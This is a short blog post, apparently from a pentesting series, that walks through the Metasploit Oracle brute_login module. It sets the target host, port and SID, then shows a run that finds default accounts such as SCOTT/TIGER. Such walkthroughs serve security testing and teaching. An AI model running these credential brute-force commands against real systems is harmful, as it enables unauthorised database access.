Oracle Pwnage with the Metasploit Oracle Modules Part 4

Posted by CG

Thank MC for this one…

msf > use auxiliary/admin/oracle/brute_login
msf auxiliary(brute_login) > set RHOST
msf auxiliary(brute_login) > info

Name: Oracle bruteforcer for known default accounts.
Version: $Revision:$

Provided by:

Basic options:
Name Current Setting Required Description
—- ————— ——– ———–
RHOST yes The Oracle host.
RPORT 1521 yes The TNS port.
SID DEMO yes The sid to authenticate with.

This module uses a list of well known authentication credentials for bruteforcing the TNS service.

msf auxiliary(brute_login) > set SID unbreakable
SID => unbreakable
msf auxiliary(brute_login) > run

[*] Found user/pass of: DBSNMP/DBSNMP…
[*] Found user/pass of: SCOTT/TIGER…
[*] Auxiliary module execution completed
msf auxiliary(brute_login) >